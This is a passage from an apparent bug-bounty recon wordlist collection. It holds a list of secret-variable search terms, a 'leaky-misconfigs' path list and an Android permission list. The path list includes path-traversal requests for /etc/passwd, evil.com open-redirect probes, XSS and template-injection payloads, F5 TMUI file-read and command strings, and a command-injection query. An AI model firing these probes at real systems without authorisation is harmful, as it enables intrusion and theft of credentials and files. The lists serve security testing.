mg_api_key 318 | mg_public_api_key 319 | mh_apikey 320 | mh_password 321 | mile_zero_key 322 | minio_access_key 323 | minio_secret_key 324 | mix_pusher_app_cluster 325 | mix_pusher_app_key 326 | msg nickserv identify filename:config 327 | mydotfiles 328 | mysql 329 | mysql password 330 | mysql_root_password 331 | netlify_api_key 332 | nexus password 333 | nexus_password 334 | node_env 335 | node_pre_gyp_accesskeyid 336 | node_pre_gyp_secretaccesskey 337 | npm_api_key 338 | npm_password 339 | npm_secret_key 340 | npmrc _auth 341 | nuget_api_key 342 | nuget_apikey 343 | nuget_key 344 | oauth_token 345 | object_storage_password 346 | octest_app_password 347 | octest_password 348 | okta_key 349 | omise_key 350 | onesignal_api_key 351 | onesignal_user_auth_key 352 | openwhisk_key 353 | org_gradle_project_sonatype_nexus_password 354 | org_project_gradle_sonatype_nexus_password 355 | os_password 356 | ossrh_jira_password 357 | ossrh_pass 358 | ossrh_password 359 | pagerduty_apikey 360 | parse_js_key 361 | pass 362 | passwd 363 | password 364 | password travis 365 | passwords 366 | path:sites databases password 367 | paypal_secret 368 | paypal_token 369 | pem private 370 | personal_key 371 | playbooks_url 372 | plotly_apikey 373 | plugin_password 374 | postgres_env_postgres_password 375 | postgresql_pass 376 | preprod 377 | private 378 | private -language:java 379 | private_key 380 | private_signing_password 381 | prod 382 | prod_password 383 | prod.access.key.id 384 | prod.secret.key 385 | PT_TOKEN language:bash 386 | publish_key 387 | pusher_app_id 388 | pwd 389 | queue_driver 390 | rabbitmq_password 391 | rds.amazonaws.com password 392 | redis_password 393 | response_auth_jwt_secret 394 | rest_api_key 395 | rinkeby_private_key 396 | root_password 397 | ropsten_private_key 398 | route53_access_key_id 399 | rtd_key_pass 400 | rtd_store_pass 401 | s3_access_key 402 | s3_access_key_id 403 | s3_key 404 | s3_key_app_logs 405 | s3_key_assets 406 | s3_secret_key 407 | salesforce_password 408 | sandbox_aws_access_key_id 409 | sandbox_aws_secret_access_key 410 | sauce_access_key 411 | secret 412 | secret access key 413 | secret_access_key 414 | secret_bearer 415 | secret_key 416 | secret_key_base 417 | secret_token 418 | secret.password 419 | secretaccesskey 420 | secretkey 421 | secrets 422 | secure 423 | security_credentials 424 | send_keys 425 | send.keys 426 | sendgrid_api_key 427 | sendgrid_key 428 | sendgrid_password 429 | sendkeys 430 | ses_access_key 431 | ses_secret_key 432 | setdstaccesskey 433 | setsecretkey 434 | sf_username 435 | SF_USERNAME salesforce 436 | shodan_api_key language:python 437 | sid_token 438 | signing_key_password 439 | signing_key_secret 440 | slack_api 441 | slack_channel 442 | slack_key 443 | slack_outgoing_token 444 | slack_signing_secret 445 | slack_token 446 | slack_webhook 447 | slash_developer_space_key 448 | snoowrap_password 449 | socrata_password 450 | sonar_organization_key 451 | sonar_project_key 452 | sonatype_password 453 | sonatype_token_password 454 | soundcloud_password 455 | sql_password 456 | sqsaccesskey 457 | square_access_token 458 | square_token 459 | squareSecret 460 | ssh 461 | ssh2_auth_password 462 | sshpass 463 | staging 464 | stg 465 | storePassword 466 | stormpath_api_key_id 467 | stormpath_api_key_secret 468 | strip_key 469 | strip_secret_key 470 | stripe 471 | stripe_key 472 | stripe_secret 473 | stripToken 474 | svn_pass 475 | swagger 476 | tesco_api_key 477 | tester_keys_password 478 | testuser 479 | thera_oss_access_key 480 | token 481 | trusted_hosts 482 | twilio_account_sid 483 | twilio_accountsid 484 | twilio_api_key 485 | twilio_api_secret 486 | twilio_secret 487 | twilio_secret_token 488 | TWILIO_SID NOT env 489 | twilio_token 490 | twilioapiauth 491 | twiliosecret 492 | twine_password 493 | twitter_secret 494 | twitterKey 495 | x-api-key 496 | xoxb 497 | xoxp 498 | zen_tkn 499 | zen_token 500 | zendesk_url 501 | twilio secret 502 | twilio_account_id 503 | twilio_account_secret 504 | twilio_acount_sid NOT env 505 | twilio_api 506 | twilio_api_auth 507 | twilio_api_sid 508 | twilio_api_token 509 | zen_key 510 | zendesk_api_token 511 | zendesk_key 512 | zendesk_token 513 | zendesk_username 514 | -------------------------------------------------------------------------------- /leaky-misconfigs.txt: -------------------------------------------------------------------------------- 1 | /+CSCOE+/logon.html 2 | /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 3 | /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 4 | /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 5 | /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 6 | /..%5c..%5c..%5c..%5c..%5cetc/passwd 7 | /..%5c..%5c..%5c..%5cetc/passwd 8 | /..%5c..%5c..%5cetc/passwd 9 | /..%5c..%5cetc/passwd 10 | /..%5cetc/passwd 11 | /..;/examples/jsp/index.html 12 | /..;/examples/servlets/index.html 13 | /..;/examples/websocket/index.xhtml 14 | /..;/manager/html 15 | /./../../../../../../../../../../etc/passwd 16 | /.composer/composer.json 17 | /.env 18 | /.env.dev.local 19 | /.env.development.local 20 | /.env.prod.local 21 | /.env.production.local 22 | /.htaccess 23 | /.htpasswd 24 | /.redmine 25 | /.settings/rules.json?auth=FIREBASE_SECRET 26 | /.svn/entries 27 | /.svn/prop 28 | /.svn/text 29 | /.well 30 | /////evil.com 31 | ///evil.com/%2F.. 32 | //admin/ 33 | //anything/admin/ 34 | //evil.com/%2F.. 35 | //evil.com/..;/css 36 | /_cat/health 37 | /_cat/indices 38 | /_cluster/health 39 | /abs/ 40 | /access/config 41 | /actuator/auditevents 42 | /actuator/auditLog 43 | /actuator/beans 44 | /actuator/caches 45 | /actuator/conditions 46 | /actuator/configprops 47 | /actuator/configurationMetadata 48 | /actuator/dump 49 | /actuator/env 50 | /actuator/events 51 | /actuator/exportRegisteredServices 52 | /actuator/features 53 | /actuator/flyway 54 | /actuator/healthcheck 55 | /actuator/heapdump 56 | /actuator/httptrace 57 | /actuator/hystrix.stream 58 | /actuator/integrationgraph 59 | /actuator/jolokia 60 | /actuator/liquibase 61 | /actuator/logfile 62 | /actuator/loggers 63 | /actuator/loggingConfig 64 | /actuator/management 65 | /actuator/mappings 66 | /actuator/metrics 67 | /actuator/refresh 68 | /actuator/registeredServices 69 | /actuator/releaseAttributes 70 | /actuator/resolveAttributes 71 | /actuator/scheduledtasks 72 | /actuator/sessions 73 | /actuator/shutdown 74 | /actuator/springWebflow 75 | /actuator/sso 76 | /actuator/ssoSessions 77 | /actuator/statistics 78 | /actuator/status 79 | /actuator/threaddump 80 | /actuator/trace 81 | /actuators/ 82 | /actuators/dump 83 | /actuators/env 84 | /actuators/health 85 | /actuators/logfile 86 | /actuators/mappings 87 | /actuators/shutdown 88 | /actuators/trace 89 | /adfs/services/trust/2005/windowstransport 90 | /adjuncts/3a890183/ 91 | /admin../admin 92 | /admin/ 93 | /Admin/ 94 | /admin/../admin 95 | /admin//phpmyadmin/ 96 | /admin/adminer.php 97 | /admin/error.log 98 | /admin/errors.log 99 | /admin/index.php 100 | /admin/log/error.log 101 | /admin/login 102 | /admin/login.html 103 | /admin/login/?next=/admin/ 104 | /admin/logs/error.log 105 | /admin/logs/errors.log 106 | /admin/views/ajax/autocomplete/user/a 107 | /admin;/ 108 | /Admin;/ 109 | /adminadminer.php 110 | /adminer.php 111 | /adminer/ 112 | /adminer/adminer.php 113 | /adminer/index.php 114 | /ADSearch.cc?methodToCall=search 115 | /aims/ps/ 116 | /airflow.cfg 117 | /AirWatch/Login 118 | /alps/profile 119 | /altair 120 | /ansible.cfg 121 | /apache 122 | /apc.php 123 | /apc/apc.php 124 | /api 125 | /api/__swagger__/ 126 | /api/_swagger_/ 127 | /api/api 128 | /api/apidocs 129 | /api/apidocs/swagger.json 130 | /api/application.wadl 131 | /api/cask/graphql 132 | /api/docs/ 133 | /api/index.html 134 | /api/jsonws 135 | /api/jsonws/invoke 136 | /api/profile 137 | /api/spec/swagger.json 138 | /api/swagger 139 | /api/swagger.json 140 | /api/swagger.yaml 141 | /api/swagger.yml 142 | /api/swagger/index.html 143 | /api/swagger/static/index.html 144 | /api/swagger/swagger 145 | /api/swagger/ui/index 146 | /api/whoami 147 | /app/etc/local.xml 148 | /app/kibana/ 149 | /application.wadl?detail=true 150 | /asdf.php 151 | /assets../.git/config 152 | /asynchPeople/ 153 | /auditevents 154 | /aura 155 | /auth.html 156 | /authorization.do 157 | /autoconfig 158 | /autodiscover/ 159 | /autoupdate/ 160 | /backup.sql 161 | /blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 162 | /blog/phpmyadmin/ 163 | /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB 164 | /bundles/kibana.style.css 165 | /bundles/login.bundle.js 166 | /cacti/ 167 | /certenroll/ 168 | /certprov/ 169 | /certsrv/ 170 | /CgiStart?page=Single 171 | /ckeditor/samples/ 172 | /cloudfoundryapplication 173 | /cluster/cluster 174 | /composer.lock 175 | /conf/ 176 | /config/database.yml 177 | /config/databases.yml 178 | /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E 179 | /configprops 180 | /console 181 | /content../.git/config 182 | /control/login 183 | /controller/config 184 | /controller/registry 185 | /counters 186 | /cp/Shares?user=&protocol=webaccess&v=2.3 187 | /crossdomain.xml 188 | /crowd/console/login.action 189 | /crx/de/index.jsp 190 | /css../.git/config 191 | /CTCWebService/CTCWebServiceBean 192 | /CTCWebService/CTCWebServiceBean?wsdl 193 | /dashboard/ 194 | /data.sql 195 | /data/adminer.php 196 | /database.sql 197 | /db.sql 198 | /dbdump.sql 199 | /dfshealth.html 200 | /dialin/ 201 | /dispatcher/invalidate.cache 202 | /Dockerrun.aws.json 203 | /domcfg.nsf 204 | /druid/coordinator/v1/leader 205 | /druid/coordinator/v1/metadata/datasources 206 | /druid/index.html 207 | /druid/indexer/v1/taskStatus 208 | /dump 209 | /dump.sql 210 | /eam/vib?id=/etc/issue 211 | /ecp/ 212 | /editor/ckeditor/samples/ 213 | /elmah.axd 214 | /email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E 215 | /emergency.php 216 | /error.log 217 | /error.txt 218 | /error/error.log 219 | /errors.log 220 | /errors.txt 221 | /errors/errors.log 222 | /etc/ 223 | /events../.git/config 224 | /evil%E3%80%82com 225 | /evil.com/ 226 | /evil.com// 227 | /ews/ 228 | /examples/jsp/index.html 229 | /examples/jsp/snp/snoop.jsp 230 | /examples/servlets/index.html 231 | /examples/websocket/index.xhtml 232 | /exchange/ 233 | /exchweb/ 234 | /explore 235 | /express 236 | /fckeditor/_samples/default.html 237 | /filezilla.xml 238 | /FileZilla.xml 239 | /filter/jmol/iframe.php?_USE=%22};alert(1337);// 240 | /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file 241 | /flow/registries 242 | /forum/phpmyadmin/ 243 | /fw.login.php 244 | /gallery/zp 245 | /global 246 | /gotoURL.asp?url=google.com&id=43569 247 | /graphiql 248 | /graphiql.css 249 | /graphiql/finland 250 | /graphql 251 | /graphql.php 252 | /graphql/graphql 253 | /graphql/schema.json 254 | /graphql/schema.xml 255 | /graphql/schema.yaml 256 | /groovyconsole 257 | /groupexpansion/ 258 | /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 259 | /health 260 | /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E 261 | /homepage.nsf 262 | /host.key 263 | /hybridconfig/ 264 | /HyperGraphQL 265 | /hystrix.stream 266 | /i.php 267 | /IdentityGuardSelfService/ 268 | /IdentityGuardSelfService/images/favicon.ico 269 | /images../.git/config 270 | /img../.git/config 271 | /index.htm 272 | /index.jsp 273 | /index.php/admin/ 274 | /INF/maven/com.atlassian.jira/atlassian 275 | /info.php 276 | /infophp.php 277 | /install.php?profile=default 278 | /installer 279 | /invoker/EJBInvokerServlet/ 280 | /invoker/JMXInvokerServlet 281 | /invoker/JMXInvokerServlet/ 282 | /ipython/tree 283 | /irj/portal 284 | /jasperserver/login.html?error=1 285 | /jira/secure/Dashboard.jspa 286 | /secure/QueryComponent!Default.jspa 287 | /jkstatus/ 288 | /jmx 289 | /jolokia 290 | /jolokia/exec/ch.qos.logback.classic 291 | /jolokia/list 292 | /jolokia/version 293 | /josso/%5C../invoker/EJBInvokerServlet/ 294 | /josso/%5C../invoker/JMXInvokerServlet/ 295 | /js../.git/config 296 | /key.pem 297 | /laravel 298 | /lfm.php 299 | /lib../.git/config 300 | /localhost.sql 301 | /log/error.log 302 | /log/errors.log 303 | /logfile 304 | /loggers 305 | /login.jsp 306 | /login?next=%2F 307 | /logon/LogonPoint/custom.html 308 | /logon/LogonPoint/index.html 309 | /logs/error.log 310 | /logs/errors.log 311 | /lol/graphql 312 | /management 313 | /manager/html 314 | /mappings 315 | /mcx/ 316 | /mcx/mcxservice.svc 317 | /media../.git/config 318 | /meet/ 319 | /meeting/ 320 | /mgmt/tm/sys/management 321 | /microsoft 322 | /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https 323 | /mifs/c/d/android.html 324 | /mifs/login.jsp 325 | /mifs/user/login.jsp 326 | /mrtg/ 327 | /MRTG/ 328 | /my.key 329 | /mysql.sql 330 | /mysqldump.sql 331 | /oab/ 332 | /ocsp/ 333 | /opcache 334 | /Orion/Login.aspx 335 | /owa/ 336 | /owncloud/config/ 337 | /package 338 | /package.json 339 | /perl 340 | /persistentchat/ 341 | /phoneconferencing/ 342 | /php 343 | /php.php 344 | /php/adminer.php 345 | /php/phpmyadmin/ 346 | /phpinfo.php 347 | /phpmyadmin/ 348 | /phpversion.php 349 | /pinfo.php 350 | /playground 351 | /plugins/servlet/gadgets/makeRequest?url=https://google.com 352 | /PMUser/ 353 | /pods 354 | /portal 355 | /powershell/ 356 | /private 357 | /privatekey.key 358 | /profile 359 | /provider.tf 360 | /PRTG/index.htm 361 | /prtg/index.htm 362 | /public/ 363 | /public/adminer.php 364 | /publicadminer.php 365 | /query 366 | /rails/actions?error=ActiveRecord 367 | /reach/sip.svc 368 | /remote/login 369 | /Reports/Pages/Folder.aspx 370 | /requesthandler/ 371 | /requesthandlerext/ 372 | /rest/api/2/dashboard?maxResults=100 373 | /rest/api/2/project?maxResults=100 374 | /rest/tinymce/1/macro/preview 375 | /rgs/ 376 | /rgsclients/ 377 | /robots.txt%2e%2e%3B/ 378 | /robots.txt..%3B/ 379 | /robots.txt../admin/ 380 | /robots.txt..;/ 381 | /robots.txt/%2e%2e%3B/ 382 | /robots.txt/..%3B/ 383 | /robots.txt/../admin/ 384 | /robots.txt/..;/ 385 | /rpc/ 386 | /rpcwithcert/ 387 | /s/sfsites/aura 388 | /sap/hana/xs/formLogin/login.html 389 | /scheduler/ 390 | /schema 391 | /search?search_key={{1337*1338}} 392 | /secure/ConfigurePortalPages!default.jspa?view=popular 393 | /secure/Dashboard.jspa 394 | /secure/ManageFilters.jspa?filter=popular&filterView=popular 395 | /secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false 396 | /secure/popups/UserPickerBrowser.jspa 397 | /security.txt 398 | /server 399 | /server.key 400 | /servicedesk/customer/user/login 401 | /servicedesk/customer/user/signup 402 | /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https 403 | /sessions/new 404 | /sfsites/aura 405 | /shutdown 406 | /sidekiq 407 | /site.sql 408 | /sitemanager.xml 409 | /solr/ 410 | /sphinx 411 | /sql.sql 412 | /sslmgr 413 | /stat.jsp?cmd=chcp+437+%7c+dir 414 | /static%2e%2e%3B/ 415 | /static..%3B/ 416 | /static../.git/config 417 | /static../admin/ 418 | /static..;/ 419 | /static/%2e%2e%3B/ 420 | /static/..%3B/ 421 | /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 422 | /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 423 | /static/..%5c..%5c..%5c..%5c..%5cetc/passwd 424 | /static/..%5c..%5c..%5c..%5cetc/passwd 425 | /static/..%5c..%5c..%5cetc/passwd 426 | /static/..%5c..%5cetc/passwd 427 | /static/..%5cetc/passwd 428 | /static/../admin/ 429 | /static/..;/ 430 | /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E 431 | /status/selfDiscovered/status 432 | /store/app/etc/local.xml 433 | /swagger 434 | /swagger/swagger 435 | /system 436 | /systemstatus.xml 437 | /Telerik.Web.UI.DialogHandler.aspx 438 | /Telerik.Web.UI.WebResource.axd?type=rau 439 | /temp.sql 440 | /test.php 441 | /threaddump 442 | /tiki 443 | /time.php 444 | /tmui/login.jsp 445 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 446 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' 447 | /tmui/tmui/login/welcome.jsp 448 | /tools/adminer.php 449 | /toolsadminer.php 450 | /trace 451 | /Trace.axd 452 | /translate.sql 453 | /ucwa/ 454 | /ueditor/php/getRemoteImage.php 455 | /unifiedmessaging/ 456 | /user/0 457 | /user/1 458 | /user/2 459 | /user/3 460 | /userportal/webpages/myaccount/login.jsp 461 | /users.sql 462 | /vendor/composer/installed.json 463 | /views/ajax/autocomplete/user/a 464 | /virtualems/Login.aspx 465 | /VirtualEms/Login.aspx 466 | /vpn/index.html 467 | /web.config 468 | /web/adminer.php 469 | /web/phpmyadmin/ 470 | /webadmin/start/ 471 | /webadminer.php 472 | /webalizer/ 473 | /webclient/Login.xhtml 474 | /webconsole/webpages/login.jsp 475 | /webmin/ 476 | /webticket/ 477 | /webticket/webticketservice.svc 478 | /webticket/webticketservice.svcabs/ 479 | /www.key 480 | /xampp/phpmyadmin/ 481 | /xmlrpc.php 482 | /xprober.php 483 | /zenphoto/zp 484 | /zipkin/ 485 | /zp 486 | /zp/zp 487 | -------------------------------------------------------------------------------- /android_all_permissions.txt: -------------------------------------------------------------------------------- 1 | android.permission.ACCESS_ALL_DOWNLOADS 2 | android.permission.ACCESS_BLUETOOTH_SHARE 3 | android.permission.ACCESS_CACHE_FILESYSTEM 4 | android.permission.ACCESS_CHECKIN_PROPERTIES 5 | android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY 6 | android.permission.ACCESS_DOWNLOAD_MANAGER 7 | android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED 8 | android.permission.ACCESS_DRM_CERTIFICATES 9 | android.permission.ACCESS_EPHEMERAL_APPS 10 | android.permission.ACCESS_FM_RADIO 11 | android.permission.ACCESS_INPUT_FLINGER 12 | android.permission.ACCESS_KEYGUARD_SECURE_STORAGE 13 | android.permission.ACCESS_LOCATION_EXTRA_COMMANDS 14 | android.permission.ACCESS_MOCK_LOCATION 15 | android.permission.ACCESS_MTP 16 | android.permission.ACCESS_NETWORK_CONDITIONS 17 | android.permission.ACCESS_NETWORK_STATE 18 | android.permission.ACCESS_NOTIFICATIONS 19 | android.permission.ACCESS_NOTIFICATION_POLICY 20 | android.permission.ACCESS_PDB_STATE 21 | android.permission.ACCESS_SURFACE_FLINGER 22 | android.permission.ACCESS_VOICE_INTERACTION_SERVICE 23 | android.permission.ACCESS_VR_MANAGER 24 | android.permission.ACCESS_WIFI_STATE 25 | android.permission.ACCESS_WIMAX_STATE 26 | android.permission.ACCOUNT_MANAGER 27 | android.permission.ALLOW_ANY_CODEC_FOR_PLAYBACK 28 | android.permission.ASEC_ACCESS 29 | android.permission.ASEC_CREATE 30 | android.permission.ASEC_DESTROY 31 | android.permission.ASEC_MOUNT_UNMOUNT 32 | android.permission.ASEC_RENAME 33 | android.permission.AUTHENTICATE_ACCOUNTS 34 | android.permission.BACKUP 35 | android.permission.BATTERY_STATS 36 | android.permission.BIND_ACCESSIBILITY_SERVICE 37 | android.permission.BIND_APPWIDGET 38 | android.permission.BIND_CARRIER_MESSAGING_SERVICE 39 | android.permission.BIND_CARRIER_SERVICES 40 | android.permission.BIND_CHOOSER_TARGET_SERVICE 41 | android.permission.BIND_CONDITION_PROVIDER_SERVICE 42 | android.permission.BIND_CONNECTION_SERVICE 43 | android.permission.BIND_DEVICE_ADMIN 44 | android.permission.BIND_DIRECTORY_SEARCH 45 | android.permission.BIND_DREAM_SERVICE 46 | android.permission.BIND_INCALL_SERVICE 47 | android.permission.BIND_INPUT_METHOD 48 | android.permission.BIND_INTENT_FILTER_VERIFIER 49 | android.permission.BIND_JOB_SERVICE 50 | android.permission.BIND_KEYGUARD_APPWIDGET 51 | android.permission.BIND_MIDI_DEVICE_SERVICE 52 | android.permission.BIND_NFC_SERVICE 53 | android.permission.BIND_NOTIFICATION_LISTENER_SERVICE 54 | android.permission.BIND_NOTIFICATION_RANKER_SERVICE 55 | android.permission.BIND_PACKAGE_VERIFIER 56 | android.permission.BIND_PRINT_RECOMMENDATION_SERVICE 57 | android.permission.BIND_PRINT_SERVICE 58 | android.permission.BIND_PRINT_SPOOLER_SERVICE 59 | android.permission.BIND_QUICK_SETTINGS_TILE 60 | android.permission.BIND_REMOTEVIEWS 61 | android.permission.BIND_REMOTE_DISPLAY 62 | android.permission.BIND_ROUTE_PROVIDER 63 | android.permission.BIND_RUNTIME_PERMISSION_PRESENTER_SERVICE 64 | android.permission.BIND_SCREENING_SERVICE 65 | android.permission.BIND_TELECOM_CONNECTION_SERVICE 66 | android.permission.BIND_TEXT_SERVICE 67 | android.permission.BIND_TRUST_AGENT 68 | android.permission.BIND_TV_INPUT 69 | android.permission.BIND_TV_REMOTE_SERVICE 70 | android.permission.BIND_VOICE_INTERACTION 71 | android.permission.BIND_VPN_SERVICE 72 | android.permission.BIND_VR_LISTENER_SERVICE 73 | android.permission.BIND_WALLPAPER 74 | android.permission.BLUETOOTH 75 | android.permission.BLUETOOTH_ADMIN 76 | android.permission.BLUETOOTH_MAP 77 | android.permission.BLUETOOTH_PRIVILEGED 78 | android.permission.BLUETOOTH_STACK 79 | android.permission.BRICK 80 | android.permission.BROADCAST_CALLLOG_INFO 81 | android.permission.BROADCAST_NETWORK_PRIVILEGED 82 | android.permission.BROADCAST_PACKAGE_REMOVED 83 | android.permission.BROADCAST_PHONE_ACCOUNT_REGISTRATION 84 | android.permission.BROADCAST_SMS 85 | android.permission.BROADCAST_STICKY 86 | android.permission.BROADCAST_WAP_PUSH 87 | android.permission.CACHE_CONTENT 88 | android.permission.CALL_PRIVILEGED 89 | android.permission.CAMERA_DISABLE_TRANSMIT_LED 90 | android.permission.CAMERA_SEND_SYSTEM_EVENTS 91 | android.permission.CAPTURE_AUDIO_HOTWORD 92 | android.permission.CAPTURE_AUDIO_OUTPUT 93 | android.permission.CAPTURE_SECURE_VIDEO_OUTPUT 94 | android.permission.CAPTURE_TV_INPUT 95 | android.permission.CAPTURE_VIDEO_OUTPUT 96 | android.permission.CARRIER_FILTER_SMS 97 | android.permission.CHANGE_APP_IDLE_STATE 98 | android.permission.CHANGE_BACKGROUND_DATA_SETTING 99 | android.permission.CHANGE_COMPONENT_ENABLED_STATE 100 | android.permission.CHANGE_CONFIGURATION 101 | android.permission.CHANGE_DEVICE_IDLE_TEMP_WHITELIST 102 | android.permission.CHANGE_NETWORK_STATE 103 | android.permission.CHANGE_WIFI_MULTICAST_STATE 104 | android.permission.CHANGE_WIFI_STATE 105 | android.permission.CHANGE_WIMAX_STATE 106 | android.permission.CLEAR_APP_CACHE 107 | android.permission.CLEAR_APP_GRANTED_URI_PERMISSIONS 108 | android.permission.CLEAR_APP_USER_DATA 109 | android.permission.CONFIGURE_DISPLAY_COLOR_TRANSFORM 110 | android.permission.CONFIGURE_WIFI_DISPLAY 111 | android.permission.CONFIRM_FULL_BACKUP 112 | android.permission.CONNECTIVITY_INTERNAL 113 | android.permission.CONTROL_INCALL_EXPERIENCE 114 | android.permission.CONTROL_KEYGUARD 115 | android.permission.CONTROL_LOCATION_UPDATES 116 | android.permission.CONTROL_VPN 117 | android.permission.CONTROL_WIFI_DISPLAY 118 | android.permission.COPY_PROTECTED_DATA 119 | android.permission.CREATE_USERS 120 | android.permission.CRYPT_KEEPER 121 | android.permission.DELETE_CACHE_FILES 122 | android.permission.DELETE_PACKAGES 123 | android.permission.DEVICE_POWER 124 | android.permission.DIAGNOSTIC 125 | android.permission.DISABLE_KEYGUARD 126 | android.permission.DISPATCH_NFC_MESSAGE 127 | android.permission.DISPATCH_PROVISIONING_MESSAGE 128 | android.permission.DOWNLOAD_CACHE_NON_PURGEABLE 129 | android.permission.DUMP 130 | android.permission.DVB_DEVICE 131 | android.permission.EXPAND_STATUS_BAR 132 | android.permission.FACTORY_TEST 133 | android.permission.FILTER_EVENTS 134 | android.permission.FLASHLIGHT 135 | android.permission.FORCE_BACK 136 | android.permission.FORCE_STOP_PACKAGES 137 | android.permission.FRAME_STATS 138 | android.permission.FREEZE_SCREEN 139 | android.permission.GET_ACCOUNTS_PRIVILEGED 140 | android.permission.GET_APP_GRANTED_URI_PERMISSIONS 141 | android.permission.GET_APP_OPS_STATS 142 | android.permission.GET_DETAILED_TASKS 143 | android.permission.GET_INTENT_SENDER_INTENT 144 | android.permission.GET_PACKAGE_IMPORTANCE 145 | android.permission.GET_PACKAGE_SIZE 146 | android.permission.GET_PASSWORD 147 | android.permission.GET_PROCESS_STATE_AND_OOM_SCORE 148 | android.permission.GET_TASKS 149 | android.permission.GET_TOP_ACTIVITY_INFO 150 | android.permission.GLOBAL_SEARCH 151 | android.permission.GLOBAL_SEARCH_CONTROL 152 | android.permission.GRANT_RUNTIME_PERMISSIONS 153 | android.permission.HARDWARE_TEST 154 | android.permission.HDMI_CEC 155 | android.permission.INJECT_EVENTS 156 | android.permission.INSTALL_GRANT_RUNTIME_PERMISSIONS 157 | android.permission.INSTALL_LOCATION_PROVIDER 158 | android.permission.INSTALL_PACKAGES 159 | android.permission.INTENT_FILTER_VERIFICATION_AGENT 160 | android.permission.INTERACT_ACROSS_USERS 161 | android.permission.INTERACT_ACROSS_USERS_FULL 162 | android.permission.INTERNAL_SYSTEM_WINDOW 163 | android.permission.INTERNET 164 | android.permission.INVOKE_CARRIER_SETUP 165 | android.permission.KILL_BACKGROUND_PROCESSES 166 | android.permission.KILL_UID 167 | android.permission.LAUNCH_TRUST_AGENT_SETTINGS 168 | android.permission.LOCAL_MAC_ADDRESS 169 | android.permission.LOCATION_HARDWARE 170 | android.permission.LOOP_RADIO 171 | android.permission.MANAGE_ACCOUNTS 172 | android.permission.MANAGE_ACTIVITY_STACKS 173 | android.permission.MANAGE_APP_OPS_RESTRICTIONS 174 | android.permission.MANAGE_APP_TOKENS 175 | android.permission.MANAGE_CA_CERTIFICATES 176 | android.permission.MANAGE_DEVICE_ADMINS 177 | android.permission.MANAGE_DOCUMENTS 178 | android.permission.MANAGE_FINGERPRINT 179 | android.permission.MANAGE_MEDIA_PROJECTION 180 | android.permission.MANAGE_NETWORK_POLICY 181 | android.permission.MANAGE_NOTIFICATIONS 182 | android.permission.MANAGE_PROFILE_AND_DEVICE_OWNERS 183 | android.permission.MANAGE_SOUND_TRIGGER 184 | android.permission.MANAGE_USB 185 | android.permission.MANAGE_USERS 186 | android.permission.MANAGE_VOICE_KEYPHRASES 187 | android.permission.MASTER_CLEAR 188 | android.permission.MEDIA_CONTENT_CONTROL 189 | android.permission.MODIFY_APPWIDGET_BIND_PERMISSIONS 190 | android.permission.MODIFY_AUDIO_ROUTING 191 | android.permission.MODIFY_AUDIO_SETTINGS 192 | android.permission.MODIFY_CELL_BROADCASTS 193 | android.permission.MODIFY_DAY_NIGHT_MODE 194 | android.permission.MODIFY_NETWORK_ACCOUNTING 195 | android.permission.MODIFY_PARENTAL_CONTROLS 196 | android.permission.MODIFY_PHONE_STATE 197 | android.permission.MOUNT_FORMAT_FILESYSTEMS 198 | android.permission.MOUNT_UNMOUNT_FILESYSTEMS 199 | android.permission.MOVE_PACKAGE 200 | android.permission.NET_ADMIN 201 | android.permission.NET_TUNNELING 202 | android.permission.NFC 203 | android.permission.NFC_HANDOVER_STATUS 204 | android.permission.NOTIFY_PENDING_SYSTEM_UPDATE 205 | android.permission.OBSERVE_GRANT_REVOKE_PERMISSIONS 206 | android.permission.OEM_UNLOCK_STATE 207 | android.permission.OVERRIDE_WIFI_CONFIG 208 | android.permission.PACKAGE_USAGE_STATS 209 | android.permission.PACKAGE_VERIFICATION_AGENT 210 | android.permission.PACKET_KEEPALIVE_OFFLOAD 211 | android.permission.PEERS_MAC_ADDRESS 212 | android.permission.PERFORM_CDMA_PROVISIONING 213 | android.permission.PERFORM_SIM_ACTIVATION 214 | android.permission.PERSISTENT_ACTIVITY 215 | android.permission.PROCESS_CALLLOG_INFO 216 | android.permission.PROCESS_PHONE_ACCOUNT_REGISTRATION 217 | android.permission.PROVIDE_TRUST_AGENT 218 | android.permission.QUERY_DO_NOT_ASK_CREDENTIALS_ON_BOOT 219 | android.permission.READ_BLOCKED_NUMBERS 220 | android.permission.READ_DREAM_STATE 221 | android.permission.READ_FRAME_BUFFER 222 | android.permission.READ_INPUT_STATE 223 | android.permission.READ_INSTALL_SESSIONS 224 | android.permission.READ_LOGS 225 | android.permission.READ_NETWORK_USAGE_HISTORY 226 | android.permission.READ_OEM_UNLOCK_STATE 227 | android.permission.READ_PRECISE_PHONE_STATE 228 | android.permission.READ_PRIVILEGED_PHONE_STATE 229 | android.permission.READ_PROFILE 230 | android.permission.READ_SEARCH_INDEXABLES 231 | android.permission.READ_SOCIAL_STREAM 232 | android.permission.READ_SYNC_SETTINGS 233 | android.permission.READ_SYNC_STATS 234 | android.permission.READ_USER_DICTIONARY 235 | android.permission.READ_WIFI_CREDENTIAL 236 | android.permission.REAL_GET_TASKS 237 | 